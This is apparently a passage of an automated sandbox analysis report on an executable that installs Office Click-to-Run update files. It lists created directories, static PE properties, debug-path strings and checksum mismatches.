    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.cs-cz.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.da-dk.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.de-de.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.el-gr.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.en-gb.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.en-us.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.es-es.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.es-mx.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.et-ee.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fi-fi.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fr-ca.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fr-fr.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.he-il.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hi-in.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hr-hr.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hu-hu.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.id-id.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.it-it.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ja-jp.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.kk-kz.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ko-kr.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.lt-lt.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.lv-lv.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ms-my.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nb-no.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nl-nl.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pl-pl.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-br.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-pt.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ro-ro.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ru-ru.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sk-sk.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sl-si.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sr-latn-rs.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sv-se.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.th-th.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.tr-tr.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.uk-ua.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.vi-vn.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.zh-cn.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.zh-tw.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RUI.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ClientCapabilities.jsonJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ClientEventLogMessages.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\concrt140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\FrequentOfficeUpdateSchedule.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\i640.cab.catJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\i640.hashJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\InspectorOfficeGadget.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\IntegratedOffice.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\inventory.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\manageability.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\MavInject32.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\msix.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\msvcp140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RClient.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RCom.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeClickToRun.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officeinventory.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeOEMPlugin.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officesvcmgr.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officesvcmgrschedule.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\offreg.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\policy.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\PushRegistrationTask.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\repoman.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ServiceWatcherSchedule.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\SharedPerformance.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\SubsystemController.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ucrtbase.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vccorlib140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vcruntime140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vcruntime140_1.dllJump to behavior
    Source: sBvrNv0wtb.exeStatic PE information: certificate valid
    Source: sBvrNv0wtb.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: sBvrNv0wtb.exeStatic file information: File size 6987352 > 1048576
    Source: sBvrNv0wtb.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x5b5e00
    Source: sBvrNv0wtb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: OfficeClickToRun.exe, 00000006.00000003.2052145588.00000248C2BE9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015189380.00000248C2BBE000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051796061.00000248C2BC9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053954532.00000248C2BFB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\en-us\SetupBootstrapper.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmp
    Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\en-us\SetupBootstrapper.pdb source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: OfficeClickToRun.exe, 00000006.00000003.2052145588.00000248C2BE9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015189380.00000248C2BBE000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051796061.00000248C2BC9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053954532.00000248C2BFB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rekk.pdb source: sBvrNv0wtb.exe, 00000000.00000003.1313913322.000001972756D000.00000004.00000020.00020000.00000000.sdmp, sBvrNv0wtb.exe, 00000000.00000003.1347329405.000001972797A000.00000004.00000020.00020000.00000000.sdmp, 918D.tmp, 00000004.00000000.1346823200.00007FF7A9234000.00000002.00000001.01000000.00000006.sdmp
    Source: InspectorOfficeGadget.exe.6.drStatic PE information: 0xABDA5564 [Fri May 13 12:24:04 2061 UTC]
    Source: initial sampleStatic PE information: section where entry point is pointing to: .hexpthk
    Source: manageability.dll.6.drStatic PE information: real checksum: 0x193f46 should be: 0x186cce
    Source: AppVScripting.dll.6.drStatic PE information: real checksum: 0x64622 should be: 0x69172
    Source: C2RINTL.nl-nl.dll.6.drStatic PE information: real checksum: 0x11e00 should be: 0x17ea1
    Source: C2RINTL.lv-lv.dll.6.drStatic PE information: real checksum: 0x1060d should be: 0x12f33
    Source: C2RINTL.fr-fr.dll.6.drStatic PE information: real checksum: 0x12423 should be: 0x14219
    Source: C2RINTL.de-de.dll.6.drStatic PE information: real checksum: 0x1c32e should be: 0x19d0f
    Source: C2RINTL.ja-jp.dll.6.drStatic PE information: real checksum: 0x16663 should be: 0x1133f
    Source: C2RINTL.en-gb.dll.6.drStatic PE information: real checksum: 0x1a08a should be: 0x1a241
    Source: C2RINTL.pt-pt.dll.6.drStatic PE information: real checksum: 0x18a93 should be: 0x1d56b
    Source: C2RINTL.da-dk.dll.6.drStatic PE information: real checksum: 0x15ae8 should be: 0x13225
    Source: appvcleaner.exe.6.drStatic PE information: real checksum: 0x187a7e should be: 0x187981
    Source: C2RINTL.hi-in.dll.6.drStatic PE information: real checksum: 0x16fd2 should be: 0x10b97
    Source: AppVCatalog.dll.6.drStatic PE information: real checksum: 0x902ab should be: 0x900b0
    Source: IntegratedOffice.exe.6.drStatic PE information: real checksum: 0x527547 should be: 0x523eb3
    Source: C2RINTL.ko-kr.dll.6.drStatic PE information: real checksum: 0x1c6d9 should be: 0x16d0d
    Source: AppVShNotify.exe.6.drStatic PE information: real checksum: 0x36af7 should be: 0x4307d
    Source: C2RINTL.el-gr.dll.6.drStatic PE information: real checksum: 0x1bad8 should be: 0x1b8f4
    Source: C2RINTL.en-us.dll.6.drStatic PE information: real checksum: 0x129b9 should be: 0xcd25
    Source: C2RINTL.sr-latn-rs.dll.6.drStatic PE information: real checksum: 0x1cc05 should be: 0x15d77
    Source: AppVOrchestration.dll.6.drStatic PE information: real checksum: 0xc1574 should be: 0xbf523
    Source: C2R32.dll.6.drStatic PE information: real checksum: 0x207482 should be: 0x20a2b3
    Source: C2RINTL.pl-pl.dll.6.drStatic PE information: real checksum: 0x1733d should be: 0x112ae
    Source: C2RINTL.sk-sk.dll.6.drStatic PE information: real checksum: 0x1df45 should be: 0x140d0
    Source: AppVIsvApi.dll.6.drStatic PE information: real checksum: 0x64377 should be: 0x69ce1
    Source: inventory.dll.6.drStatic PE information: real checksum: 0x6d308c should be: 0x6d04c3
    Source: C2RINTL.uk-ua.dll.6.drStatic PE information: real checksum: 0x12eac should be: 0x1c274
    Source: C2RINTL.cs-cz.dll.6.drStatic PE information: real checksum: 0x1de36 should be: 0x18bb4
